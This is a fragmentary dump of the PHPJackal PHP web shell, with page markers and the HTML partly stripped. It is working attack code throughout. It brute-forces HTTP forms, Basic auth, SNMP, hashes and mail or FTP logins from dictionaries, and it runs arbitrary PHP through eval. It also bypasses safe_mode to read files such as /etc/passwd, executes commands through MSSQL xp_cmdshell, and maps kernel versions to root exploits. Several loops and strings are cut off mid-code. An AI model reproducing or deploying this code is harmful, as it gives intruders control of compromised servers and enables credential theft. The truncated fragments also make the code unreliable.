fwrite($sock,"user $user\n");$r=fgets($sock);if($r{0}=='-')return 0;


22/39

fwrite($sock,"pass $pass\n");$r=fgets($sock);fclose($sock);if($r{0}=='+')return 1;return 0;}function formcrackeR(){

global $errorbox,$footer,$et,$hcwd;if(!empty($_REQUEST['start'])){if(isset($_REQUEST['loG'])&& !empty($_REQUEST['logfilE'])){$log=1;$file=$_REQUEST['logfilE'];}else $log=0;$url=$_REQUEST['target'];$uf=$_REQUEST['userf'];$pf=$_REQUEST['passf'];$sf=$_REQUEST['submitf'];$sv=$_REQUEST['submitv'];$method=$_REQUEST['method'];$fail=$_REQUEST['fail'];$dic=$_REQUEST['dictionary'];

$type=$_REQUEST['combo'];$user=(!empty($_REQUEST['user']))?$_REQUEST['user']:'';if(!file_exists($dic))die("$errorbox Can not open dictionary.$et$footer");$dictionary=fopen($dic,'r');echo 'Cracking started...
';while(!feof($dictionary)){if($type){$combo=trim(fgets($dictionary)," \n\r");$user=substr($combo,0,strpos($combo,':'));$pass=substr($combo,strpos($combo,':')+1);}else{$pass=trim(fgets($dictionary)," \n\r");}

$url.="?$uf=$user&$pf=$pass&$sf=$sv";$res=check_urL($url,$method,$fail,12);if(!$res){echo "U: $user P: $pass
";if($log)file_add_contentS($file,"U: $user P: $pass\r\n");if(!$type)break;}}fclose($dictionary);echo 'Done!
';}else echo "HTTP Form cracker:Dictionary:Dictionary type:Simple (P)Combo (U:P)Username:$hcwdAction Page:Method:POSTGETUsername field name:Password field name:


23/39

4' bgcolor='#808080'>Submit name:Submit value:Fail string:Log $et";}function hashcrackeR(){global $errorbox,$t,$et,$hcwd;if(!empty($_REQUEST['hash']) && !empty($_REQUEST['dictionary']) && !empty($_REQUEST['type'])){if(isset($_REQUEST['loG'])&& !empty($_REQUEST['logfilE'])){$log=1;$file=$_REQUEST['logfilE'];}else $log=0;$dictionary=fopen($_REQUEST['dictionary'],'r');

if($dictionary){$hash=strtoupper($_REQUEST['hash']);echo 'Cracking '.htmlspecialchars($hash).'...
';$type=($_REQUEST['type']=='MD5')?'md5':'sha1';while(!feof($dictionary)){$word=trim(fgets($dictionary)," \n\r");if($hash==strtoupper(($type($word)))){echo "The answer is $word
";if($log)file_add_contentS($file,"$x\r\n");break;}}echo 'Done!';fclose($dictionary);}else{

echo "$errorbox Can not open dictionary.$et";}}echo "${t}Hash cracker:Dictionary:Hash:Type:MD5SHA1L

og $hcwd $et";}function pr0xy(){global $errorbox,$et,$footer,$hcwd;echo "Navigator: $hcwd$et";if(!empty($_REQUEST['urL'])){

$u=parse_url($_REQUEST['urL']);$host=$u['host'];$file=(!empty($u['path']))?$u['path']:'/';$dir=dirname($file);


24/39

$con=getiT($_REQUEST['urL']);$s=array("href=mailto"=>"HrEf=mailto","HREF=mailto"=>"HrEf=mailto","href='mailto"=>"HrEf=\"mailto","HREF=\"mailto"=>"HrEf=\"mailto","href=\'mailto"=>"HrEf=\"mailto","HREF=\'mailto"=>"HrEf=\"mailto","href=\"http"=>"HrEf=\"".hlinK("seC=px&urL=http"),"href=\'http"=>"HrEf=\"".hlinK("seC=px&urL=http"),"HREF=\'http"=>"HrEf=\"".hlinK("seC=px&urL=http"),"href=http"=>"HrEf=".hlinK("seC=px&urL=http"),"HREF=http"=>"HrEf=".hlinK("seC=px&urL=http"),"href=\""=>"HrEf=\"".hlinK("seC=px&urL=h

ttp://$host/$dir/"),"HREF=\""=>"HrEf=\"".hlinK("seC=px&urL=http://$host/$dir/"),"href=\""=>"HrEf=\'".hlinK("seC=px&urL=http://$host/$dir/"),'HREF="'=>'HrEf="'.hlinK("seC=px&urL=http://$host/$dir/"),"href="=>"HrEf=".hlinK("seC=px&urL=http://$host/$dir/"),"HREF="=>"HrEf=".hlinK("seC=px&urL=http://$host/$dir/"));$con=replace_stR($s,$con);echo $con;}}function sqlclienT(){global $t,$errorbox,$et,$hcwd;if(!empty($_REQUEST['serveR']) && !empty($_REQUEST['useR']) && isset($_REQUEST['pasS']) && !empty($_REQUEST['querY'])){

$server=$_REQUEST['serveR'];$type=$_REQUEST['typE'];$pass=$_REQUEST['pasS'];$user=$_REQUEST['useR'];$query=$_REQUEST['querY'];$db=(empty($_REQUEST['dB']))?'':$_REQUEST['dB'];$res=querY($type,$server,$user,$pass,$db,$query);if($res){$res=str_replace('-----','',$res);$res=str_replace('+++++','',$res);$r=explode('[+][+][+]',$res);$r[1]=str_replace('[-][-][-]',"",$r[1]);echo "".$r[1].''.$r[0]."$et
";}else{

echo "$errorbox Failed!$et
";}}if(empty($_REQUEST['typE']))$_REQUEST['typE']='';echo "${t}SQL cilent:MySQLMSSQLOraclePostgreSQLServer:Username:Password:Database:Query:";if (!empty($_REQUEST['querY'])) echo htmlspecialchars(($_REQUEST['querY']));else echo 'SHOW DATABASES'; echo "$hcwd


25/39

class=buttons type=submit value='Submit Query'>$et";}function querY($type,$host,$user,$pass,$db='',$query){$res='';switch($type){case 'MySQL':if(!function_exists('mysql_connect'))return 0;

$link=mysql_connect($host,$user,$pass);if($link){if(!empty($db))mysql_select_db($db,$link);$result=mysql_query($query,$link);while($data=mysql_fetch_row($result))$res.=implode('-----',$data).'+++++';$res.='[+][+][+]';for($i=0;$i


26/39

return $res;}break;}return 0;}function phpevaL(){

global $t,$hcwd,$et;echo '';if(!empty($_REQUEST['code'])){$s=array(''=>'');echo "";echo htmlspecialchars(eval(replace_stR($s,$_REQUEST['code'])));echo '

';}echo "${t}Evaler:Codes:";if(!empty($_REQUEST['code']))echo htmlspecialchars($_REQUEST['code']);echo "$hcwd$et";}function rootxpL(){$v=php_uname();$db=array('2.6.17'=>'prctl3, raptor_prctl, py2','2.6.16'=>'raptor_prctl, exp.sh,raptor, raptor2, h00lyshit','2.6.15'=>'py2, exp.sh, raptor, raptor2, h00lyshit','2.6.14'=>'raptor, raptor2, h00lyshit','2.6.13'=>'kdump, local26, py2, raptor_prctl, exp.sh, prctl3, h00lyshit','2.6.12'=>'h00lyshit','2.6.11'=>'krad3, krad, h00lyshit','2.6.10'=>'h00lyshit, stackgrow2, uselib24, exp.sh, krad, krad2','2.6.9'=>'exp.sh, krad3, py2, prctl3, h00lyshit','2.6.8'=>'h00lyshit, krad, krad2','2.6.7'=>'h00lyshit, krad, krad2','2.6.6'=>'h00lyshit, krad, krad2','2.6.2'=>'h00lyshit, krad, mremap_pte','2.6.'=>'prctl, kmdx, newsmp, pwned, ptrace_kmod, ong_bak','2.4.29'=>'elflbl, expand_stack, stackgrow2, uselib24, smpracer','2.4.27'=>'

elfdump, uselib24','2.4.25'=>'uselib24','2.4.24'=>'mremap_pte, loko, uselib24','2.4.23'=>'mremap_pte, loko, uselib24','2.4.22'=>'loginx, brk, km2, loko, ptrace,uselib24, brk2, ptrace-kmod','2.4.21'=>'w00t, brk, uselib24, loginx, brk2, ptrace-kmod','2.4.20'=>'mremap_pte, w00t, brk, ave, uselib24, loginx, ptrace-kmod, ptrace, kmod','2.4.19'=>'newlocal, w00t, ave, uselib24, loginx, kmod','2.4.18'=>'km2, w00t, uselib24, loginx, kmod','2.4.17'=>'newlocal, w00t, uselib24, loginx,kmod','2.4.16'=>'w00t, uselib24, loginx','2.4.10'=>'w00t, brk, uselib24, loginx','2.4.9'=>'ptrace24, uselib24','2.4.'=>'kmdx, remap, pwned, ptrace_kmod, ong_bak','2.2.25'=>'mremap_pte','2.2.24'=>'ptrace','2.2.'=>'rip, ptrace');foreach($db as $k=>$x)if(strstr($v,$k))return $x;return 0;}

function toolS(){global $t,$hcwd,$et,$cwd;if(!empty($_REQUEST['serveR']) && !empty($_REQUEST['domaiN'])){$ser=fsockopen($_REQUEST['serveR'],43,$en,$es,5);fputs($ser,$_REQUEST['domaiN']."\r\n");echo '';while(!feof($ser))echo fgets($ser,1024);echo '';fclose($ser);}elseif(!empty($_REQUEST['urL'])){$h='';$u=parse_url($_REQUEST['urL']);

$host=$u['host'];$file=(!empty($u['path']))?$u['path']:'/';$port=(empty($u['port']))?80:$u['port'];$ser=fsockopen($host,$port,$en,$es,5);


27/39

if($ser){fputs($ser,"GET $file\r\nHost: $host\r\n\r\n");echo '';while($h!="\r\n"){$h=fgets($ser,1024);echo $h;}echo '';fclose($ser);}

}elseif(!empty($_REQUEST['ouT']) && isset($_REQUEST['pW'])&& !empty($_REQUEST['uN'])){$htpasswd=$_REQUEST['ouT'].DIRECTORY_SEPARATOR.'.htpasswd';$htaccess=$_REQUEST['ouT'].DIRECTORY_SEPARATOR.'.htaccess';file_put_contents($htpasswd,$_REQUEST['uN'].':'.crypt(trim($_REQUEST['pW']),CRYPT_STD_DES));file_put_contents($htaccess,"AuthName \"Secure\"\r\nAuthType Basic\r\nAuthUserFile $htpasswd\r\nRequire valid-user\r\n");echo 'Done';}$s="";echo "${t}WhoIs:${s}Server:domain:$hcwd$et
${t}.ht* generator:${s}Username:Password:Directory:$hcwd$et
${t}Grab header:${s}URL:$hcwd$et
";}function hexvieW(){

if(!empty($_REQUEST['filE'])){$f=$_REQUEST['filE'];echo "OffsetHexASCII";$file=fopen($f,'r');$i=-1;while(!feof($file)){$ln='';$i++;echo "";echo str_repeat('0',(8-strlen($i*16))).$i*16;echo '';echo "


28/39

echo "'>";for($j=0;$j


29/39

echo "$pr$i:(mb_send_mail$po";if(file_exists('/tmp/mb_send_mail'))unlink('/tmp/mb_send_mail');mb_send_mail(NULL, NULL, NULL, NULL,'-C $file -X /tmp/mb_send_mail');readfile('/tmp/mb_send_mail');$i++;}if(function_exists('curl_init')){

echo "$pr$i:(curl_init [A]$po";$fh=curl_init('file://'.$file.'');$tmp=curl_exec($fh);echo $tmp;$i++;echo "$pr$i:(curl_init [B]$po";$i++;if(strstr($file,DIRECTORY_SEPARATOR))$ch=curl_init('file:///'.$file."\x00/../../../../../../../../../../../../".__FILE__);else $ch=curl_init('file://'.$file."\x00".__FILE__);var_dump(curl_exec($ch));}

if(is_writable('.')){echo "$pr$i:(php.ini$po";file_put_contents('php.ini','safe_mode = Off');readfile($file);unlink('php.ini');$i++;}if(extension_loaded('perl')){echo "$pr$i:(perl$po";echo perlshelL("type \"$file\"");$i++;}if(is_object($ws=new COM('WScript.Shell'))){

echo "$pr$i:(COM$po";echo comshelL("type \"$file\"",$ws);$i++;}if(extension_loaded('ffi') && $windows){echo "$pr$i:(FFI$po";echo ffishelL("type \"$file\"");$i++;}if(checkfunctioN('win_shell_execute')){echo "$pr$i:(win32std$po";echo winshelL("type \"$file\"");

$i++;}if(checkfunctioN('win32_create_service')){echo "$pr$i:(win32service$po";echo srvshelL("type \"$file\"");$i++;}if(function_exists('imap_open')){echo "$pr$i:(imap [A]$po";$str=imap_open('/etc/passwd','','');$list=imap_list($str,$file,'*');for($i=0;$i


30/39

$tmp=imap_body($str,1);echo $tmp;imap_close($str);$i++;}if($file=='/etc/passwd'){echo "$pr$i:(posix$po";

for($uid=0;$uid1)$list=imap_list($str,trim($s[0]),trim($s[1]));else $list=imap_list($str,trim($str[0]),'*');for($i=0;$i


31/39

echo '';}elseif(!empty($_REQUEST['serveR']) && !empty($_REQUEST['coM']) && !empty($_REQUEST['dB']) && !empty($_REQUEST['useR']) && isset($_REQUEST['pasS'])){$res='';$tb=uniqid('NJ');$db=mssql_connect($_REQUEST['serveR'],$_REQUEST['useR'],$_REQUEST['pasS']);

mssql_select_db($_REQUEST['dB'],$db);mssql_query("create table $tb ( string VARCHAR (500) NULL)",$db);mssql_query("insert into $tb EXEC master.dbo.xp_cmdshell '".$_REQUEST['coM']."'",$db);$re=mssql_query("select * from $tb",$db);while(($row=mssql_fetch_row($re))){$res.= $row[0]."\r\n";}mssql_query("drop table $tb",$db);mssql_close($db);echo "$res
";

}$f=(!empty($_REQUEST['file']))?htmlspecialchars($_REQUEST['file']):'/etc/passwd';$u=(!empty($_REQUEST['user']))?htmlspecialchars($_REQUEST['user']):'root';$p=(!empty($_REQUEST['pass']))?htmlspecialchars($_REQUEST['pass']):'123456';$d=(!empty($_REQUEST['db']))?htmlspecialchars($_REQUEST['db']):'test';echo "${t}Use PHP Bugs:File:$hcwd$et
${t}Use MySQL:File:Username:Password:Database:$hcwd$et
${t}MSSQL Exec:Server:Username:Password:Command:Database:$hcwd$et";}function crackeR(){

global $errorbox,$t,$et,$crack,$cwd;$check=(!empty($_REQUEST['dictionary']) && !empty($_REQUEST['target']))?1:0;if(!empty($_REQUEST['cracK']) && !$check){


32/39

$c=htmlspecialchars($_REQUEST['cracK']);echo "$t$c cracker:$crack";}elseif(!empty($_REQUEST['cracK']) && $check){$pro=strtolower($_REQUEST['cracK']).'checK';$target=$_REQUEST['target'];$type=$_REQUEST['combo'];

$user=(!empty($_REQUEST['user']))?$_REQUEST['user']:'';$dictionary=fopen($_REQUEST['dictionary'],'r');if(isset($_REQUEST['loG'])&& !empty($_REQUEST['logfilE'])){$log=1;$file=$_REQUEST['logfilE'];}else $log=0;if($dictionary){echo 'Cracking '.htmlspecialchars($target).'...
';while(!feof($dictionary)){if($type){$combo=trim(fgets($dictionary)," \n\r");$user=substr($combo,0,strpos($combo,':'));$pass=substr($combo,strpos($combo,':')+1);}else{

$pass=trim(fgets($dictionary)," \n\r");}$ret=$pro($target,$user,$pass,5);if($ret==-1){echo "$errorbox Can not connect to server.$et";break;}else{if($ret){$x="U: $user P: $pass";echo "$x
";if($log)file_add_contentS($file,"$x\r\n");if(!$type)break;}}}echo '
Done';fclose($dictionary);}else{echo "$errorbox Can not open dictionary.$et";}

}else{echo "[Hash] - [SMTP] - [POP3] - [IMAP]- [FTP] - [SNMP] - [MySQL] - [MSSQL] - [HTTP Form] - [HTTP Auth(basic)] - [Dictionary maker]$et";}}function snmpcrackeR(){global $t,$et,$errorbox,$hcwd;if(!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])){$target=$_REQUEST['target'];if(isset($_REQUEST['loG'])&& !empty($_REQUEST['logfilE'])){$log=1;$file=$_REQUEST['logfilE'];}else $log=0;$dictionary=fopen($_REQUEST['dictionary'],'r');if($dictionary){echo 'Cracking '.htmlspecialchars($target).'...
';while(!feof($dictionary)){

$com=trim(fgets($dictionary)," \n\r");$res=snmpchecK($target,$com,2);if($res){echo "$com
";if($log)file_add_contentS($file,"$com\r\n");}


33/39

}echo '
Done';fclose($dictionary);}else{echo "$errorbox Can not open dictionary.$et";}

}else echo "${t}SNMP cracker:$hcwdDictionary:Server:Log $et";}function dicmakeR(){

global $errorbox,$windows,$footer,$t,$et,$hcwd;$combo=(empty($_REQUEST['combo']))?0:1;if(!empty($_REQUEST['range'])&& !empty($_REQUEST['output']) && !empty($_REQUEST['min']) && !empty($_REQUEST['max'])){$min=$_REQUEST['min'];$max=$_REQUEST['max'];if($max


34/39

$user=trim(fgets($in)," \n\r");if(!strstr($user,':'))continue;$user=substr($user,0,(strpos($user,':')));if($combo)fwrite($output,$user.':'.$user."\n");else fwrite($output,$user."\n");}fclose($input);fclose($output);echo 'Done';

}}}else{$output=fopen($_REQUEST['output'],'w');if($output){while(!feof($input)){$user=trim(fgets($input)," \n\r");if(!strstr($user,':'))continue;$user=substr($user,0,(strpos($user,':')));if($combo)fwrite($output,$user.':'.$user."\n");else fwrite($output,$user."\n");}

fclose($input);fclose($output);echo 'Done';}else echo $errorbox.' Unable to write data to '.htmlspecialchars($_REQUEST['input'])."$et
";}}elseif(!empty($_REQUEST['url']) && !empty($_REQUEST['output'])){$res=downloadiT($_REQUEST['url'],$_REQUEST['output']);if($combo && $res){$file=file($_REQUEST['output']);$output=fopen($_REQUEST['output'],'w');foreach($file as $v)fwrite($output,"$v:$v\n");fclose($output);

}echo 'Done';}else{$temp=whereistmP().DIRECTORY_SEPARATOR;echo "${t}Wordlist generator:Range:a-zA-Z0-9Min lenght:12345678910Max lenght:23456789101112131415Output:Combo style output$hcwd$et
${t}Grab dictionary:Grab from:Output:


35/39

lue='$temp.dic' name=output size=35>Combo style output$hcwd$et
${t}Download dictionary:URL:Output:Combo style output$hcwd$et";}}function ftpclienT(){global $t,$cwd,$hcwd,$errorbox,$et;$td="";if(!empty($_REQUEST['hosT']) && !empty($_REQUEST['useR']) && isset($_REQUEST['pa

sS']) && function_exists('ftp_connect')){$user=$_REQUEST['useR'];$pass=$_REQUEST['pasS'];$host=$_REQUEST['hosT'];$con=ftp_connect($_REQUEST['hosT'],21,10);if($con){$ftp=ftp_login($con,$user,$pass);if($ftp){if(!empty($_REQUEST['PWD']))ftp_chdir($con,$_REQUEST['PWD']);if(!empty($_REQUEST['filE'])){$file=$_REQUEST['filE'];$mode=(isset($_REQUEST['modE']))?FTP_BINARY:FTP_ASCII;if(isset($_REQUEST['geT']))ftp_get($con,$file,$file,$mode);elseif(isset($_REQUEST['puT']))ftp_put($con,$file,$file,$mode);elseif(isset($_REQUEST['rM'])){

ftp_rmdir($con,$file);ftp_delete($con,$file);}elseif(isset($_REQUEST['mD']))ftp_mkdir($con,$file);}$pwd=ftp_pwd($con);$dir=ftp_nlist($con,'');$d=opendir($cwd);echo "${td}Server:${td}Client:$td$td$td";foreach($dir as $n)echo "$n
";echo "$td";while($cdir=readdir($d))if($cdir!='.' && $cdir!='..')echo "$cdir
"; echo "${td}Name:Binary$td$et";}else echo "$errorbox Wrong username or password$et";}else echo "$errorbox Can not connect to server!$et";}

else{echo "${t}FTP cilent:Server:


36/39

'#666666'>Username:Password:$hcwd$et";

}}function calC(){global $t,$et,$hcwd;$fu=array('-','md5','sha1','crc32','hex','ip2long','decbin','dechex','hexdec','bindec','long2ip','base64_encode','base64_decode','urldecode','urlencode','des','strrev');if(!empty($_REQUEST['input']) && (in_array($_REQUEST['to'],$fu))){$to=$_REQUEST['to'];echo "${t}Output:
";if($to=='hex')for($i=0;$i


37/39

$pass=trim(fgets($dictionary)," \n\r");}$so=fsockopen($host,80,$en,$es,5);if(!$so){echo "$errorbox Can not connect to host$et";break;}else{$packet="$method /$page HTTP/1.0\r\nAccept-Encoding: text\r\nHost: $host\r\nReferer: $host\r\nConnection: Close\r\nAuthorization: Basic ".base64_encode("$user:$

pass");if($method=='POST')$packet.='Content-Type: application/x-www-form-urlencoded\r\nContent-Length: '.strlen($data);$packet.="\r\n\r\n";$packet.=$data;fputs($so,$packet);$res=substr(fgets($so),9,2);fclose($so);if($res=='20'){echo "U: $user P: $pass";if($log)file_add_contentS($file,"U:$user P: $pass\r\n");}}}

echo 'Done!';}else echo "${t}HTTP Auth cracker:POSTGETDictionary:Dictionary type:Simple (P)Combo (U:P)Username:Server:Log $hcwd $et";}function openiT($name){$ext=strtolower(substr($name,strrpos($name,'.')+1));$src=array('php','php3','php4','phps','phtml','phtm','inc');if(in_array($ext,$src))highlight_file($name);else echo ''.htmlspecialchars(file_get_contents($name)).'';}function opensesS($name){$sess=file_get_contents($name);$var=explode(';',$sess);echo "Name\tType\tValue\r\n";foreach($var as $v){$t=explode('',$v);$c=explode(':',$t[1]);$y='';if($c[0]=='i')$y='Integer';elseif($c[0]=='s')$y='String';elseif($c[0]=='b')$y='Boolean';elseif($c[0]=='f')$y='Float';elseif($c[0]=='a')$y='Array';elseif($c[0]=='o')$y='Object';elseif($c[0]=='n')$y='Null';

echo $t[0]."\t$y\t".$c[1]."\r\n";}echo '';


38/39

}function logouT(){setcookie('passw','',time()-10000);header('Location: '.hlinK());}?>

body{scrollbar-base-color: #484848; scrollbar-arrow-color: #FFFFFF; scrollbar-track-color: #969696;font-size:16px;font-family:"Arial Narrow";}Table {font-size: 15px;} .buttons{font-family:Verdana;font-size:10pt;font-weight:normal;font-style:normal;color:#FFFFFF;background-color:#555555;border-style:solid;border-width:1px;border-color:#FFFFFF;}textarea{border: 0px #000000 solid;background: #EEEEEE;color: #000000;}input{background: #EEEEEE;border-width:1px;border-style:solid;border-color:black}select{background: #EEEEEE; border: 0px #000000 none;}function HS(box){

if(document.getElementById(box).style.display!="none"){document.getElementById(box).style.display="none";document.getElementById('lk').innerHTML="+";}else{document.getElementById(box).style.display="";document.getElementById('lk').innerHTML="-";}}function chmoD($file){$ch=prompt("Changing file mode["+$file+"]: ex. 777","");if($ch != null)location.href=""+$file+"&modE="+$ch;

}PHPJackal [][Back] -


39/39

case 'fm':filemanageR();break;case 'sc':scanneR();break;case 'phpinfo':phpinfo();break;case 'edit':if(!empty($_REQUEST['open']))editoR($_REQUEST['filE']);if(!empty($_REQUEST['Save'])){$filehandle=fopen($_REQUEST['file'],'w');fwrite($filehandle,$_REQUEST['edited']);

fclose($filehandle);}if(!empty($_REQUEST['filE']))editoR($_REQUEST['filE']);else editoR('');break;case 'openit':openiT($_REQUEST['namE']);break;case 'cr':crackeR();break;case 'dic':dicmakeR();break;case 'tools':toolS();break;case 'hex':hexvieW();break;case 'img':showimagE($_REQUEST['filE']);break;case 'inc':if(file_exists($_REQUEST['filE']))include($_REQUEST['filE']);break;case 'hc':hashcrackeR();break;case 'fcr':formcrackeR();break;

case 'auth':authcrackeR();break;case 'ftpc':ftpclienT();break;case 'eval':phpevaL();break;case 'snmp':snmpcrackeR();break;case 'px':pr0xy();break;case 'webshell':webshelL();break;case 'mailer':maileR();break;case 'br':brshelL();break;case 'asm':safemodE();break;case 'sqlcl':sqlclienT();break;case 'calc':calC();break;case 'sysinfo':sysinfO();break;case 'checksum':checksuM($_REQUEST['filE']);break;

case 'logout':logouT();break;default: echo $intro;}}else echo $intro;echo $footer;?>

Documents

Php Jackal